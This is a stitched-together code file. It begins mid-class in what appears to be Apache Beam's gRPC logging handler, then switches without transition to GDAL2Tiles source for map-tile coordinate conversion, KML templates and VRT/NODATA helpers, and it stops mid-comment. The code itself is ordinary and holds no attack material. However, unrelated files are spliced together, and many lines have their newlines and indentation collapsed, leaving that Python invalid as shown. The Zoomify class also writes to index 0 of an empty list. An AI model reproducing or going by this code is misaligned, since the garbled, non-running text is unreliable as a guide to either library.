    ch = GRPCChannelFactory.insecure_channel(log_service_descriptor.url)
    # Make sure the channel is ready to avoid [BEAM-4649]
    grpc.channel_ready_future(ch).result(timeout=60)
    self._log_channel = grpc.intercept_channel(ch, WorkerIdInterceptor())

    # Daemon thread: also drives the write side, since connect() attaches the
    # _write_log_entries generator to the Logging stream.
    self._reader = threading.Thread(
        target=lambda: self._read_log_control_messages(),
        name='read_log_control_messages')
    self._reader.daemon = True
    self._reader.start()

  def connect(self):
    """(Re)open the bidirectional Logging stream and return its iterator."""
    if hasattr(self, '_logging_stub'):
      del self._logging_stub
    self._logging_stub = beam_fn_api_pb2_grpc.BeamFnLoggingStub(
        self._log_channel)
    return self._logging_stub.Logging(self._write_log_entries())

  def emit(self, record):
    """Convert a stdlib LogRecord to a LogEntry and enqueue it (non-blocking)."""
    log_entry = beam_fn_api_pb2.LogEntry()
    log_entry.severity = self.LOG_LEVEL_MAP[record.levelno]
    log_entry.message = self.format(record)
    log_entry.thread = record.threadName
    log_entry.log_location = record.module + '.' + record.funcName
    # Split the float timestamp into whole seconds + nanoseconds.
    (fraction, seconds) = math.modf(record.created)
    nanoseconds = 1e9 * fraction
    log_entry.timestamp.seconds = int(seconds)
    log_entry.timestamp.nanos = int(nanoseconds)

    try:
      self._log_entry_queue.put(log_entry, block=False)
    except queue.Full:
      # Queue is at capacity: drop the record rather than block the caller.
      self._dropped_logs += 1

  def close(self):
    """Flush out all existing log entries and unregister this handler."""
    try:
      self._alive = False
      # Acquiring the handler lock ensures ``emit`` is not run until the lock is
      # released.
      self.acquire()
      self._log_entry_queue.put(self._FINISHED, timeout=5)
      # wait on server to close.
      self._reader.join()
      self.release()
      # Unregister this handler.
      super(FnApiLogRecordHandler, self).close()
    except Exception:
      # Log rather than raising exceptions, to avoid clobbering
      # underlying errors that may have caused this to close
      # prematurely.
      logging.error("Error closing the logging channel.", exc_info=True)

  def _write_log_entries(self):
    """Generator feeding the gRPC stream: batches queued entries until the
    _FINISHED sentinel is seen."""
    done = False
    while not done:
      # Block for at least one entry, then opportunistically drain up to a
      # full batch without blocking.
      log_entries = [self._log_entry_queue.get()]
      try:
        for _ in range(self._MAX_BATCH_SIZE):
          log_entries.append(self._log_entry_queue.get_nowait())
      except queue.Empty:
        pass
      if log_entries[-1] is self._FINISHED:
        done = True
        log_entries.pop()
      if log_entries:
        yield beam_fn_api_pb2.LogEntry.List(log_entries=log_entries)

  def _read_log_control_messages(self):
    # Only reconnect when we are alive.
    # We can drop some logs in the unlikely event of logging connection
    # dropped(not closed) during termination when we still have logs to be sent.
    # This case is unlikely and the chance of reconnection and successful
    # transmission of logs is also very less as the process is terminating.
    # I choose not to handle this case to avoid un-necessary code complexity.
    while self._alive:
      # Loop for reconnection.
      log_control_iterator = self.connect()
      if self._dropped_logs > 0:
        logging.warning("Dropped %d logs while logging client disconnected",
                        self._dropped_logs)
        self._dropped_logs = 0
      try:
        for _ in log_control_iterator:
          # Loop for consuming messages from server.
          # TODO(vikasrk): Handle control messages.
          pass
        # iterator is closed
        return
      except Exception as ex:
        print("Logging client failed: {}... resetting".format(ex),
              file=sys.stderr)
        # Wait a bit before trying a reconnect
        time.sleep(0.5)  # 0.5 seconds
gdal2tiles.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # ****************************************************************************** # $Id$ # # Project: Google Summer of Code 2007, 2008 (http://code.google.com/soc/) # Support: BRGM (http://www.brgm.fr) # Purpose: Convert a raster into TMS (Tile Map Service) tiles in a directory. # - generate Google Earth metadata (KML SuperOverlay) # - generate simple HTML viewer based on Google Maps and OpenLayers # - support of global tiles (Spherical Mercator) for compatibility # with interactive web maps a la Google Maps # Author: Klokan Petr Pridal, klokan at klokan dot cz # Web: http://www.klokan.cz/projects/gdal2tiles/ # GUI: http://www.maptiler.org/ # ############################################################################### # Copyright (c) 2008, Klokan Petr Pridal # Copyright (c) 2010-2013, Even Rouault <even dot rouault at mines-paris dot org> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. 
# ******************************************************************************

from __future__ import print_function, division

import math
from multiprocessing import Pipe, Pool, Process, Manager
import os
import tempfile
import shutil
import sys
from uuid import uuid4
from xml.etree import ElementTree

from osgeo import gdal
from osgeo import osr

try:
    from PIL import Image
    import numpy
    import osgeo.gdal_array as gdalarray
except Exception:
    # 'antialias' resampling is not available
    pass

__version__ = "$Id$"

# Supported values for the corresponding command-line options.
resampling_list = ('average', 'near', 'bilinear', 'cubic', 'cubicspline', 'lanczos', 'antialias')
profile_list = ('mercator', 'geodetic', 'raster')
webviewer_list = ('all', 'google', 'openlayers', 'leaflet', 'none')

# =============================================================================
# =============================================================================
# =============================================================================

__doc__globalmaptiles = """
globalmaptiles.py

Global Map Tiles as defined in Tile Map Service (TMS) Profiles
==============================================================

Functions necessary for generation of global tiles used on the web.
It contains classes implementing coordinate conversions for:

  - GlobalMercator (based on EPSG:3857)
       for Google Maps, Yahoo Maps, Bing Maps compatible tiles
  - GlobalGeodetic (based on EPSG:4326)
       for OpenLayers Base Map and Google Earth compatible tiles

More info at:

http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification
http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation
http://msdn.microsoft.com/en-us/library/bb259689.aspx
http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates

Created by Klokan Petr Pridal on 2008-07-03.
Google Summer of Code 2008, project GDAL2Tiles for OSGEO.

In case you use this class in your product, translate it to another language
or find it useful for your project please let me know.
My email: klokan at klokan dot cz.
I would like to know where it was used.

Class is available under the open-source GDAL license (www.gdal.org).
"""

MAXZOOMLEVEL = 32


class GlobalMercator(object):
    r"""
    TMS Global Mercator Profile
    ---------------------------

    Functions necessary for generation of tiles in Spherical Mercator projection,
    EPSG:3857.

    Such tiles are compatible with Google Maps, Bing Maps, Yahoo Maps,
    UK Ordnance Survey OpenSpace API, ...
    and you can overlay them on top of base maps of those web mapping applications.

    Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).

    What coordinate conversions do we need for TMS Global Mercator tiles::

         LatLon      <->       Meters      <->     Pixels    <->       Tile

     WGS84 coordinates   Spherical Mercator  Pixels in pyramid  Tiles in pyramid
         lat/lon            XY in meters     XY pixels Z zoom      XYZ from TMS
        EPSG:4326           EPSG:387
         .----.              ---------               --                TMS
        /      \     <->     |       |     <->     /----/    <->      Google
        \      /             |       |           /--------/          QuadTree
         -----               ---------         /------------/
       KML, public         WebMapService         Web Clients      TileMapService

    What is the coordinate extent of Earth in EPSG:3857?

      [-20037508.342789244, -20037508.342789244, 20037508.342789244, 20037508.342789244]
      Constant 20037508.342789244 comes from the circumference of the Earth in meters,
      which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
      In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
      $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
      Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.

    What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?

      whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
      every lower zoom level resolution is always divided by two
      initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062

    What is the difference between TMS and Google Maps/QuadTree tile name convention?

      The tile raster itself is the same (equal extent, projection, pixel size),
      there is just different identification of the same raster tile.
      Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
      Google placed the origin [0,0] to the top-left corner, reference is XYZ.
      Microsoft is referencing tiles by a QuadTree name, defined on the website:
      http://msdn2.microsoft.com/en-us/library/bb259689.aspx

    The lat/lon coordinates are using WGS84 datum, yes?

      Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
      Well, the web clients like Google Maps are projecting those coordinates by
      Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
      the were on the WGS84 ellipsoid.

      From MSDN documentation:
      To simplify the calculations, we use the spherical form of projection, not
      the ellipsoidal form. Since the projection is used only for map display,
      and not for displaying numeric coordinates, we don't need the extra precision
      of an ellipsoidal projection. The spherical projection causes approximately
      0.33 percent scale distortion in the Y direction, which is not visually
      noticeable.

    How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?

      You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
      All of the tools supports -t_srs 'epsg:3857'.

      For other GIS programs check the exact definition of the projection:
      More info at http://spatialreference.org/ref/user/google-projection/
      The same projection is designated as EPSG:3857. WKT definition is in the
      official EPSG database.
    Proj4 Text:
        +proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0
        +units=m +nadgrids=@null +no_defs

    Human readable WKT format of EPSG:3857:
         PROJCS["Google Maps Global Mercator",
             GEOGCS["WGS 84",
                 DATUM["WGS_1984",
                     SPHEROID["WGS 84",6378137,298.257223563,
                         AUTHORITY["EPSG","7030"]],
                     AUTHORITY["EPSG","6326"]],
                 PRIMEM["Greenwich",0],
                 UNIT["degree",0.0174532925199433],
                 AUTHORITY["EPSG","4326"]],
             PROJECTION["Mercator_1SP"],
             PARAMETER["central_meridian",0],
             PARAMETER["scale_factor",1],
             PARAMETER["false_easting",0],
             PARAMETER["false_northing",0],
             UNIT["metre",1,
                 AUTHORITY["EPSG","9001"]]]
    """

    def __init__(self, tileSize=256):
        "Initialize the TMS Global Mercator pyramid"
        self.tileSize = tileSize
        # Resolution (m/px) at zoom 0: full Mercator extent over one tile.
        self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
        # 156543.03392804062 for tileSize 256 pixels
        # Half the Mercator extent; shifts the origin to the bottom-left corner.
        self.originShift = 2 * math.pi * 6378137 / 2.0
        # 20037508.342789244

    def LatLonToMeters(self, lat, lon):
        "Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
        mx = lon * self.originShift / 180.0
        my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
        my = my * self.originShift / 180.0
        return mx, my

    def MetersToLatLon(self, mx, my):
        "Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
        lon = (mx / self.originShift) * 180.0
        lat = (my / self.originShift) * 180.0

        # Inverse Mercator (Gudermannian) for the latitude.
        lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
        return lat, lon

    def PixelsToMeters(self, px, py, zoom):
        "Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
        res = self.Resolution(zoom)
        mx = px * res - self.originShift
        my = py * res - self.originShift
        return mx, my

    def MetersToPixels(self, mx, my, zoom):
        "Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
        res = self.Resolution(zoom)
        px = (mx + self.originShift) / res
        py = (my + self.originShift) / res
        return px, py

    def PixelsToTile(self, px, py):
        "Returns a tile covering region in given pixel coordinates"
        # ceil(...) - 1 maps pixel 0..tileSize (inclusive) to tile 0, etc.
        tx = int(math.ceil(px / float(self.tileSize)) - 1)
        ty = int(math.ceil(py / float(self.tileSize)) - 1)
        return tx, ty

    def PixelsToRaster(self, px, py, zoom):
        "Move the origin of pixel coordinates to top-left corner"
        mapSize = self.tileSize << zoom
        return px, mapSize - py

    def MetersToTile(self, mx, my, zoom):
        "Returns tile for given mercator coordinates"
        px, py = self.MetersToPixels(mx, my, zoom)
        return self.PixelsToTile(px, py)

    def TileBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile in EPSG:3857 coordinates"
        minx, miny = self.PixelsToMeters(tx * self.tileSize, ty * self.tileSize, zoom)
        maxx, maxy = self.PixelsToMeters((tx + 1) * self.tileSize, (ty + 1) * self.tileSize, zoom)
        return (minx, miny, maxx, maxy)

    def TileLatLonBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile in latitude/longitude using WGS84 datum"
        bounds = self.TileBounds(tx, ty, zoom)
        minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
        maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])

        return (minLat, minLon, maxLat, maxLon)

    def Resolution(self, zoom):
        "Resolution (meters/pixel) for given zoom level (measured at Equator)"

        # return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
        return self.initialResolution / (2**zoom)

    def ZoomForPixelSize(self, pixelSize):
        "Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i != -1: return i - 1 else: return 0 # We don't want to scale up def GoogleTile(self, tx, ty, zoom): "Converts TMS tile coordinates to Google Tile coordinates" # coordinate origin is moved from bottom-left to top-left corner of the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom): "Converts TMS tile coordinates to Microsoft QuadTree" quadKey = "" ty = (2**zoom - 1) - ty for i in range(zoom, 0, -1): digit = 0 mask = 1 << (i - 1) if (tx & mask) != 0: digit += 1 if (ty & mask) != 0: digit += 2 quadKey += str(digit) return quadKey class GlobalGeodetic(object): r""" TMS Global Geodetic Profile --------------------------- Functions necessary for generation of global tiles in Plate Carre projection, EPSG:4326, "unprojected profile". Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters) and you can overlay the tiles on top of OpenLayers base map. Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we need for TMS Global Geodetic tiles? Global Geodetic tiles are using geodetic coordinates (latitude,longitude) directly as planar coordinates XY (it is also called Unprojected or Plate Carre). We need only scaling to pixel pyramid and cutting to tiles. Pyramid has on top level two tiles, so it is not square but rectangle. Area [-180,-90,180,90] is scaled to 512x256 pixels. TMS has coordinate origin (for pixels and tiles) in bottom-left corner. Rasters are in EPSG:4326 and therefore are compatible with Google Earth. LatLon <-> Pixels <-> Tiles WGS84 coordinates Pixels in pyramid Tiles in pyramid lat/lon XY pixels Z zoom XYZ from TMS EPSG:4326 .----. 
                ----
     /      \     <->    /--------/    <->      TMS
     \      /         /--------------/
      -----        /--------------------/
    WMS, KML         Web Clients, Google Earth  TileMapService
    """

    def __init__(self, tmscompatible, tileSize=256):
        self.tileSize = tileSize
        if tmscompatible is not None:
            # Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
            # Adheres to OSGeo TMS spec
            # http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
            self.resFact = 180.0 / self.tileSize
        else:
            # Defaults the resolution factor to 1.40625 (1 tile @ level 0)
            # Adheres OpenLayers, MapProxy, etc default resolution for WMTS
            self.resFact = 360.0 / self.tileSize

    def LonLatToPixels(self, lon, lat, zoom):
        "Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
        res = self.resFact / 2**zoom
        px = (180 + lon) / res
        py = (90 + lat) / res
        return px, py

    def PixelsToTile(self, px, py):
        "Returns coordinates of the tile covering region in pixel coordinates"
        tx = int(math.ceil(px / float(self.tileSize)) - 1)
        ty = int(math.ceil(py / float(self.tileSize)) - 1)
        return tx, ty

    def LonLatToTile(self, lon, lat, zoom):
        "Returns the tile for zoom which covers given lon/lat coordinates"
        px, py = self.LonLatToPixels(lon, lat, zoom)
        return self.PixelsToTile(px, py)

    def Resolution(self, zoom):
        "Resolution (arc/pixel) for given zoom level (measured at Equator)"

        return self.resFact / 2**zoom

    def ZoomForPixelSize(self, pixelSize):
        "Maximal scaledown zoom of the pyramid closest to the pixelSize."
        for i in range(MAXZOOMLEVEL):
            if pixelSize > self.Resolution(i):
                if i != 0:
                    return i - 1
                else:
                    return 0    # We don't want to scale up

    def TileBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile"
        res = self.resFact / 2**zoom
        return (
            tx * self.tileSize * res - 180,
            ty * self.tileSize * res - 90,
            (tx + 1) * self.tileSize * res - 180,
            (ty + 1) * self.tileSize * res - 90
        )

    def TileLatLonBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile in the SWNE form"
        b = self.TileBounds(tx, ty, zoom)
        return (b[1], b[0], b[3], b[2])


class Zoomify(object):
    """
    Tiles compatible with the Zoomify viewer
    ----------------------------------------
    """

    def __init__(self, width, height, tilesize=256, tileformat='jpg'):
        """Initialization of the Zoomify tile tree"""

        self.tilesize = tilesize
        self.tileformat = tileformat
        imagesize = (width, height)
        tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))

        # Size (in tiles) for each tier of pyramid.
        self.tierSizeInTiles = []
        self.tierSizeInTiles.append(tiles)

        # Image size in pixels for each pyramid tier
        self.tierImageSize = []
        self.tierImageSize.append(imagesize)

        # Halve the image until it fits on a single tile; each halving adds a tier.
        while (imagesize[0] > tilesize or imagesize[1] > tilesize):
            imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
            tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize))
            self.tierSizeInTiles.append(tiles)
            self.tierImageSize.append(imagesize)

        # Coarsest tier first.
        self.tierSizeInTiles.reverse()
        self.tierImageSize.reverse()

        # Depth of the Zoomify pyramid, number of tiers (zoom levels)
        self.numberOfTiers = len(self.tierSizeInTiles)

        # Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = [] self.tileCountUpToTier[0] = 0 for i in range(1, self.numberOfTiers + 1): self.tileCountUpToTier.append( self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] + self.tileCountUpToTier[i - 1] ) def tilefilename(self, x, y, z): """Returns filename for tile with given coordinates""" tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z] return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256), "%s-%s-%s.%s" % (z, x, y, self.tileformat)) class GDALError(Exception): pass def exit_with_error(message, details=""): # Message printing and exit code kept from the way it worked using the OptionParser (in case # someone parses the error output) sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n") sys.stderr.write("gdal2tiles.py: error: %s\n" % message) if details: sys.stderr.write("\n\n%s\n" % details) sys.exit(2) def generate_kml(tx, ty, tz, tileext, tilesize, tileswne, options, children=None, **args): """ Template for the KML. Returns filled string. 
""" if not children: children = [] args['tx'], args['ty'], args['tz'] = tx, ty, tz args['tileformat'] = tileext if 'tilesize' not in args: args['tilesize'] = tilesize if 'minlodpixels' not in args: args['minlodpixels'] = int(args['tilesize'] / 2) if 'maxlodpixels' not in args: args['maxlodpixels'] = int(args['tilesize'] * 8) if children == []: args['maxlodpixels'] = -1 if tx is None: tilekml = False args['title'] = options.title else: tilekml = True args['title'] = "%d/%d/%d.kml" % (tz, tx, ty) args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz) if tx == 0: args['drawOrder'] = 2 * tz + 1 elif tx is not None: args['drawOrder'] = 2 * tz else: args['drawOrder'] = 0 url = options.url if not url: if tilekml: url = "../../" else: url = "" s = """<?xml version="1.0" encoding="utf-8"?> <kml xmlns="http://www.opengis.net/kml/2.2"> <Document> <name>%(title)s</name> <description></description> <Style> <ListStyle id="hideChildren"> <listItemType>checkHideChildren</listItemType> </ListStyle> </Style>""" % args if tilekml: s += """ <Region> <LatLonAltBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonAltBox> <Lod> <minLodPixels>%(minlodpixels)d</minLodPixels> <maxLodPixels>%(maxlodpixels)d</maxLodPixels> </Lod> </Region> <GroundOverlay> <drawOrder>%(drawOrder)d</drawOrder> <Icon> <href>%(ty)d.%(tileformat)s</href> </Icon> <LatLonBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonBox> </GroundOverlay> """ % args for cx, cy, cz in children: csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz) s += """ <NetworkLink> <name>%d/%d/%d.%s</name> <Region> <LatLonAltBox> <north>%.14f</north> <south>%.14f</south> <east>%.14f</east> <west>%.14f</west> </LatLonAltBox> <Lod> <minLodPixels>%d</minLodPixels> <maxLodPixels>-1</maxLodPixels> </Lod> </Region> <Link> <href>%s%d/%d/%d.kml</href> <viewRefreshMode>onRegion</viewRefreshMode> 
<viewFormat/> </Link> </NetworkLink> """ % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest, args['minlodpixels'], url, cz, cx, cy) s += """ </Document> </kml> """ return s def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''): """Scales down query dataset to the tile dataset""" querysize = dsquery.RasterXSize tilesize = dstile.RasterXSize tilebands = dstile.RasterCount if options.resampling == 'average': # Function: gdal.RegenerateOverview() for i in range(1, tilebands + 1): # Black border around NODATA res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i), 'average') if res != 0: exit_with_error("RegenerateOverview() failed on %s, error %d" % ( tilefilename, res)) elif options.resampling == 'antialias': # Scaling by PIL (Python Imaging Library) - improved Lanczos array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8) for i in range(tilebands): array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1), 0, 0, querysize, querysize) im = Image.fromarray(array, 'RGBA') # Always four bands im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS) if os.path.exists(tilefilename): im0 = Image.open(tilefilename) im1 = Image.composite(im1, im0, im1) im1.save(tilefilename, tiledriver) else: if options.resampling == 'near': gdal_resampling = gdal.GRA_NearestNeighbour elif options.resampling == 'bilinear': gdal_resampling = gdal.GRA_Bilinear elif options.resampling == 'cubic': gdal_resampling = gdal.GRA_Cubic elif options.resampling == 'cubicspline': gdal_resampling = gdal.GRA_CubicSpline elif options.resampling == 'lanczos': gdal_resampling = gdal.GRA_Lanczos # Other algorithms are implemented by gdal.ReprojectImage(). 
        # (tail of scale_query_to_tile) Give the query dataset a synthetic geotransform
        # that maps its querysize-pixel extent onto tilesize pixels, so ReprojectImage
        # performs the downscaling with the chosen resampling kernel.
        dsquery.SetGeoTransform((0.0, tilesize / float(querysize), 0.0, 0.0, 0.0, tilesize / float(querysize)))
        dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))

        res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
        if res != 0:
            exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))


def setup_no_data_values(input_dataset, options):
    """
    Extract the NODATA values from the dataset or use the passed arguments as override if any
    """
    in_nodata = []
    if options.srcnodata:
        # Command-line override: comma-separated list of per-band float values.
        nds = list(map(float, options.srcnodata.split(',')))
        if len(nds) < input_dataset.RasterCount:
            # Fewer values than bands: cycle the list, then truncate to one value per band.
            in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
        else:
            in_nodata = nds
    else:
        # No override: collect the NODATA values declared on the dataset's own bands
        # (bands without a declared value contribute nothing to the list).
        for i in range(1, input_dataset.RasterCount + 1):
            raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
            if raster_no_data is not None:
                in_nodata.append(raster_no_data)

    if options.verbose:
        print("NODATA: %s" % in_nodata)

    # Returns a (possibly empty) list of floats.
    return in_nodata


def setup_input_srs(input_dataset, options):
    """
    Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
    WKT representation

    Uses in priority the one passed in the command line arguments.
If None, tries to extract them from the input dataset
    """

    input_srs = None
    input_srs_wkt = None

    if options.s_srs:
        # An SRS given explicitly on the command line takes priority.
        input_srs = osr.SpatialReference()
        input_srs.SetFromUserInput(options.s_srs)
        input_srs_wkt = input_srs.ExportToWkt()
    else:
        input_srs_wkt = input_dataset.GetProjection()
        if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
            # No projection on the raster itself; fall back to the GCP projection.
            input_srs_wkt = input_dataset.GetGCPProjection()
        if input_srs_wkt:
            input_srs = osr.SpatialReference()
            input_srs.ImportFromWkt(input_srs_wkt)

    # NOTE: input_srs may still be None if the dataset carries no SRS information at all;
    # callers (open_input) check for that case.
    return input_srs, input_srs_wkt


def setup_output_srs(input_srs, options):
    """
    Setup the desired SRS (based on options)
    """
    output_srs = osr.SpatialReference()

    if options.profile == 'mercator':
        # Spherical/Web Mercator (Google Maps compatible).
        output_srs.ImportFromEPSG(3857)
    elif options.profile == 'geodetic':
        # Plain WGS84 lat/lon.
        output_srs.ImportFromEPSG(4326)
    else:
        # 'raster' profile: keep the input SRS unchanged (may be None).
        output_srs = input_srs

    return output_srs


def has_georeference(dataset):
    # A dataset counts as georeferenced if it has either a non-identity affine
    # geotransform or at least one ground control point.
    return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
            dataset.GetGCPCount() != 0)


def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
    """
    Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns
    it unmodified
    """
    if not from_srs or not to_srs:
        raise GDALError("from and to SRS must be defined to reproject the dataset")

    # Reproject when the SRSes differ, or when GCPs are present (GCPs always
    # require a warp even with identical SRSes).
    if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
        to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
                                              from_srs.ExportToWkt(), to_srs.ExportToWkt())

        if options and options.verbose:
            print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
            to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)

        return to_dataset
    else:
        return from_dataset


def add_gdal_warp_options_to_string(vrt_string, warp_options):
    """
    Insert the given {name: value} warp options as <Option> elements into the
    <GDALWarpOptions> section of a warped-VRT XML string. Returns the modified
    XML string, or the input unchanged if there are no options or no
    GDALWarpOptions section.
    """
    if not warp_options:
        return vrt_string

    vrt_root = ElementTree.fromstring(vrt_string)
    options = vrt_root.find("GDALWarpOptions")

    if options is None:
        return vrt_string

    for key, value in warp_options.items():
        # Build an <Option name="key">value</Option> element and prepend it.
        tb = ElementTree.TreeBuilder()
        tb.start("Option", {"name": key})
        tb.data(value)
        tb.end("Option")
        elem = tb.close()
        options.insert(0, elem)

    return ElementTree.tostring(vrt_root).decode()


def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
    """
    Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
    """
    # TODO: gbataille - Seems that I forgot tests there
    if nodata_values != []:
        # Round-trip the warped VRT through a temp file so its XML can be edited.
        temp_file = gettempfilename('-gdal2tiles.vrt')
        warped_vrt_dataset.GetDriver().CreateCopy(temp_file, warped_vrt_dataset)
        with open(temp_file, 'r') as f:
            vrt_string = f.read()

        vrt_string = add_gdal_warp_options_to_string(
            vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})

# TODO: gbataille - check the need for this replacement. Seems to work without
#  # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)): # s = s.replace( # '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)), # """ # <BandMapping src="%i" dst="%i"> # <SrcNoDataReal>%i</SrcNoDataReal> # <SrcNoDataImag>0</SrcNoDataImag> # <DstNoDataReal>%i</DstNoDataReal> # <DstNoDataImag>0</DstNoDataImag> # </BandMapping> # """ % ((i+1), (i+1), nodata_values[i], nodata_values[i])) # save the corrected VRT with open(temp_file, 'w') as f: f.write(vrt_string) corrected_dataset = gdal.Open(temp_file) os.unlink(temp_file) # set NODATA_VALUE metadata corrected_dataset.SetMetadataItem( 'NODATA_VALUES', ' '.join([str(i) for i in nodata_values])) if options and options.verbose: print("Modified warping result saved into 'tiles1.vrt'") # TODO: gbataille - test replacing that with a gdal write of the dataset (more # accurately what's used, even if should be the same with open("tiles1.vrt", "w") as f: f.write(vrt_string) return corrected_dataset def add_alpha_band_to_string_vrt(vrt_string): # TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha # To be checked vrt_root = ElementTree.fromstring(vrt_string) index = 0 nb_bands = 0 for subelem in list(vrt_root): if subelem.tag == "VRTRasterBand": nb_bands += 1 color_node = subelem.find("./ColorInterp") if color_node is not None and color_node.text == "Alpha": raise Exception("Alpha band already present") else: if nb_bands: # This means that we are one element after the Band definitions break index += 1 tb = ElementTree.TreeBuilder() tb.start("VRTRasterBand", {'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"}) tb.start("ColorInterp", {}) tb.data("Alpha") tb.end("ColorInterp") tb.end("VRTRasterBand") elem = tb.close() vrt_root.insert(index, elem) warp_options = vrt_root.find(".//GDALWarpOptions") tb = ElementTree.TreeBuilder() tb.start("DstAlphaBand", {}) tb.data(str(nb_bands + 1)) tb.end("DstAlphaBand") elem = tb.close() warp_options.append(elem) # TODO: gbataille - this is a 
